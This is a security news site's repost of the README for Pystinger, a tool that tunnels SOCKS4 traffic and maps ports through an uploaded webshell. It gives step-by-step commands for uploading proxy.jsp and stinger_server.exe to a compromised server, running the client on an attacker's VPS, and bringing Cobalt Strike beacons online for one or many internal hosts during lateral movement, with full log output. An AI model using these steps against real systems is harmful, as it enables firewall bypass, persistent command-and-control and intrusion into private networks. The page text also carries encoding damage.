Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ Pystinger - Bypass Firewall For Traffic Forwarding Using Webshell
Team IT Security Nachrichtenportal Logo

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security
RSS Feed Symbol fรผr Team IT Security 800+ IT News als RSS Feed abonnieren



๐Ÿ“š Pystinger - Bypass Firewall For Traffic Forwarding Using Webshell


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


Pystinger implements SOCK4 proxy and port mapping through webshell.

It can be directly used by metasploit-framework, viper, cobalt strike for session online.

Pystinger is developed in python, and currently supports three proxy scripts: php, jsp(x) and aspx.


Usage

Suppose the domain name of the server is http://example.com :8080 The intranet IPAddress of the server intranet is 192.168.3.11


SOCK4 Proxy
  • proxy.jsp Upload to the target server and ensure that http://example.com:8080/proxy.jsp can access,the page returns UTF-8
  • stinger_server.exe Upload to the target server,AntSword run cmdstart D:/XXX/stinger_server.exeto start pystinger-server

Don't run D:/xxx/singer_server.exe directly,it will cause TCP disconnection

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • Your will see following output
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0   .1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Now you have started a socks4a proxy on VPS 127.0.0.1:60000 for intranet of example.com.
  • Now the target server(example.com) 127.0.0.1:60020 has been mapped to the VPS 127.0.0.1:60020

cobaltstrike`s beacon online for single target
  • proxy.jsp Upload to the target server and ensure that http://example.com:8080/proxy.jsp can access,the page returns UTF-8
  • stinger_server.exe Upload to the target server,AntSword run cmdstart D:/XXX/stinger_server.exeto start pystinger-server

Don't run D:/xxx/singer_server.exe directly,it will cause TCP disconnection

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • Your will see following output
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0   .1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Add listener on cobaltstrike,Listener port is 60020 (Handler/LISTEN port in RAT CONFIG of output ),listener address is 127.0.0.1
  • Generate payload,upload to the target and run.

cobaltstrike`s beacon online for multi targets
  • proxy.jsp Upload to the target server and ensure that http://example.com:8080/proxy.jsp can access,the page returns UTF-8
  • stinger_server.exe Upload to the target server,AntSword run cmdstart D:/XXX/stinger_server.exe 192.168.3.11to start pystinger-server (192.168.3.11 is intranet ipaddress of the target)

192.168.3.11 can change to 0.0.0.0

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • Your will see following output
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168   .3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Add listener on cobaltstrike,Listener port is 60020 (Handler/LISTEN port in RAT CONFIG of output ),listener address is 192.168.3.11
  • Generate payload,upload to the target and run.
  • When lateral movement to other hosts, you can point the payload to 192.168.3.11:60020 to make beacon online

Custom header and proxy

  • If the webshell needs to configure cookie or authorization, the request header can be configured through the -- header parameter --header "Authorization: XXXXXX,Cookie: XXXXX"

  • If the webshell needs to be accessed by proxy, you can set the proxy through -- proxy --proxy "socks5:127.0.0.1:1081"


Related tools

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna


Tested

stinger_server\stinger_client
  • windows
  • linux

proxy.jsp(x)/php/aspx
  • php7.2
  • tomcat7.0
  • iis8.0

Update log

2.0 Update time: 2019-09-29

  • Socks4 proxy service moves to client

2.1 Update time: 2020-01-07



...



Sharing is caring on Social Media

๐Ÿ”— Reddit
๐Ÿ”— Telegram
๐Ÿ”— LinkedIn
๐Ÿ”— Xing
๐Ÿ”— Twitter
๐Ÿ”— Whatsapp
๐Ÿ”— Facebook
๐Ÿ”— Flipboard

Join the Team IT Security Community

๐Ÿ”— "IT Sicherheit" Reddit-Gruppe
๐Ÿ”— "IT Sicherheit" Telegramm-Seite

๐Ÿ“Œ WordPress webshell plugin for RCE: webshell plugin and interactive shell for pentesting a WordPress website


๐Ÿ“ˆ 44.15 Punkte

๐Ÿ“Œ 7,500+ MikroTik Routers Are Forwarding Ownersโ€™ Traffic to the Attackers, How is Yours?


๐Ÿ“ˆ 25.85 Punkte

๐Ÿ“Œ MikroTik Routers Are Forwarding Owners' Traffic To Unknown Attackers


๐Ÿ“ˆ 25.85 Punkte

๐Ÿ“Œ Forwarding Traffic Through SSH


๐Ÿ“ˆ 25.85 Punkte

๐Ÿ“Œ [Null-Byte Bypassing technique] Upload php webshell


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ [Double Extension Bypassing technique] Upload php webshell


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ PHP Webbots Technic via File Include & Webshell VD


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ MMD-0041-2015 - Reversing PE Mail-Grabber Spambot & its C99 WebShell Gate


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ [webapps] - Airia - Webshell Upload Exploit


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ PHP Webbots Technic via File Include & Webshell VD


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ PHP Webbots Technic via File Include & Webshell VD


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Ninety-Five Percent of Webshell Attacks Written in PHP


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ [Null-Byte Bypassing technique] Upload php webshell


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ [Double Extension Bypassing technique] Upload php webshell


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ PHP Webbots Technic via File Include & Webshell VD


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ MMD-0041-2015 - Reversing PE Mail-Grabber Spambot & its C99 WebShell Gate


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ [webapps] - Airia - Webshell Upload Exploit


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ PHP Webbots Technic via File Include & Webshell VD


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ PHP Webbots Technic via File Include & Webshell VD


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Ninety-Five Percent of Webshell Attacks Written in PHP


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Advanced LFI - Part 10 Webshell through PHP harnessing LFI and modifying permissions


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Novahot - A Webshell Framework For Penetration Testers


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Instantbox - Spins Up Temporary Linux Systems With Instant Webshell Access From Any Browser


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Advanced LFI - Part 10 Webshell through PHP harnessing LFI and modifying permissions


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ PHP/WebShell.NEA


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ MMD-0041-2015 - Reversing PE Mail-Grabber Spambot & its C99 WebShell Gate


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ webshell manager (open source, c#)


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Awesome webshell collection. Including 150 Github repo, and 200+ blog posts.


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ SecurityNotFound - 404 Page Not Found Webshell


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Webshell-Analyzer - Web Shell Scanner And Analyzer


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ slopShell - The Only Php Webshell You Need


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ MSMAP - Memory WebShell Generator


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ explore a Wordpress PHP BACKDOOR webshell


๐Ÿ“ˆ 22.08 Punkte

๐Ÿ“Œ Detected: Alleged sale of Webshell access at National Regulatory Authority from Greece


๐Ÿ“ˆ 22.08 Punkte











matomo

Kontakt

24/7 kontakt@tsecurity.de

Weitere Informationen

Google Android Playstore Download Button fรผr Team IT Security
๐Ÿ”— Impressum
๐Ÿ”— Datenschutz
Paypal Spenden fรผr Projekt

Social Media

๐Ÿ”— Facebook
๐Ÿ”— Reddit
๐Ÿ”— Team IT Security als Elektron App
๐Ÿ”— © 2015-2023 Team IT Security Nachrichtenportal รผber Cybersecurity
๐Ÿ”— CMS "myDraft" a PHP Portal Software